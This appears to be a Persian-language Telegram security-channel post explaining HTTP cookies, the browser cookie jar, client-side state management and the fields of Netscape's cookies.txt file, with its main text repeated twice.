🎒 کوله پشتی کاربر (Cookie Jar)
مرورگر، محتوای کوکیهای ارسالی از سرور را در هدرهای Set-Cookie به خاطر میسپارد و مجموعه کوکیها را در یک فضای ذخیره سازی به نام Cookie Jar ( like یک چمدان پر از برچسب های مختلف سرورها) ذخیره می کند.
وقتی کاربر در آینده به همان سایت بازگردد، مرورگر، کوکیهای مربوط به آن سرور را انتخاب کرده و آنها را در هدر درخواست Cookie ارسال میکند.
🎯 هدف اصلی کوکیها: State Management
هدف اصلی کوکیها این است که به مرورگر اجازه میدهند مجموعهای از اطلاعات خاص یک سرور را جمع آوری کند و هر بار که کاربر آن سایت را باز میکند، این اطلاعات را به سرور ارائه دهد.
از آنجایی که وظیفه ذخیره اطلاعات کوکی بر عهده مرورگر است، به این سیستم اصطلاحاً مدیریت状态 سمت کلاینت (Client-Side State) میگویند. مشخصات رسمی کوکیها با نام HTTP State Management Mechanism شناخته میشود.
📁 مرورگرها و ذخیره سازی کوکیها
مرورگرهای مختلف، کوکیها را به روشهای مختلف ذخیره میکنند.
مرورگر Netscape Navigator کوکیها را در یک فایل متنی به نام cookies.txt ذخیره میکند.
هر خط در این فایل نشاندهنده یک کوکی است و هفت فیلد دارد که با تب از هم جدا شدهاند:
domain: دامنهای که کوکی به آن تعلق دارد.
allh: اگر TRUE باشد، به این معنی است که همه میزبانهای خاص در آن دامنه میتوانند کوکی را دریافت کنند.
path: مسیری در دامنه که با کوکی مرتبط است.
secure: اگر TRUE باشد، کوکی فقط از طریق یک اتصال SSL امن ارسال میشود.
expiration: زمان انقضای کوکی به شکل ثانیه از 1 ژانویه 1970, 00:00:00 GMT (مبدأ زمان یونیکس).
name: نام متغیر کوکی.
value: مقدار متغیر کوکی.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
📝 ذخیره مستقیم اطلاعات
با این حال، کوکیها فقط به یک ID محدود نیستند. برخی سرورها انتخاب میکنند که اطلاعات را مستقیماً در کوکی نگه دارند. مثال:
Cookie: name="Brian Totty"; phone="555-1212"
🎒 کوله پشتی کاربر (Cookie Jar)
مرورگر، محتوای کوکیهای ارسالی از سرور را در هدرهای Set-Cookie به خاطر میسپارد و مجموعه کوکیها را در یک فضای ذخیره سازی به نام Cookie Jar ( like یک چمدان پر از برچسب های مختلف سرورها) ذخیره می کند.
وقتی کاربر در آینده به همان سایت بازگردد، مرورگر، کوکیهای مربوط به آن سرور را انتخاب کرده و آنها را در هدر درخواست Cookie ارسال میکند.
🎯 هدف اصلی کوکیها: State Management
هدف اصلی کوکیها این است که به مرورگر اجازه میدهند مجموعهای از اطلاعات خاص یک سرور را جمع آوری کند و هر بار که کاربر آن سایت را باز میکند، این اطلاعات را به سرور ارائه دهد.
از آنجایی که وظیفه ذخیره اطلاعات کوکی بر عهده مرورگر است، به این سیستم اصطلاحاً مدیریت状态 سمت کلاینت (Client-Side State) میگویند. مشخصات رسمی کوکیها با نام HTTP State Management Mechanism شناخته میشود.
📁 مرورگرها و ذخیره سازی کوکیها
مرورگرهای مختلف، کوکیها را به روشهای مختلف ذخیره میکنند.
مرورگر Netscape Navigator کوکیها را در یک فایل متنی به نام cookies.txt ذخیره میکند.
هر خط در این فایل نشاندهنده یک کوکی است و هفت فیلد دارد که با تب از هم جدا شدهاند:
domain: دامنهای که کوکی به آن تعلق دارد.
allh: اگر TRUE باشد، به این معنی است که همه میزبانهای خاص در آن دامنه میتوانند کوکی را دریافت کنند.
path: مسیری در دامنه که با کوکی مرتبط است.
secure: اگر TRUE باشد، کوکی فقط از طریق یک اتصال SSL امن ارسال میشود.
expiration: زمان انقضای کوکی به شکل ثانیه از 1 ژانویه 1970, 00:00:00 GMT (مبدأ زمان یونیکس).
name: نام متغیر کوکی.
value: مقدار متغیر کوکی.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
👍4❤1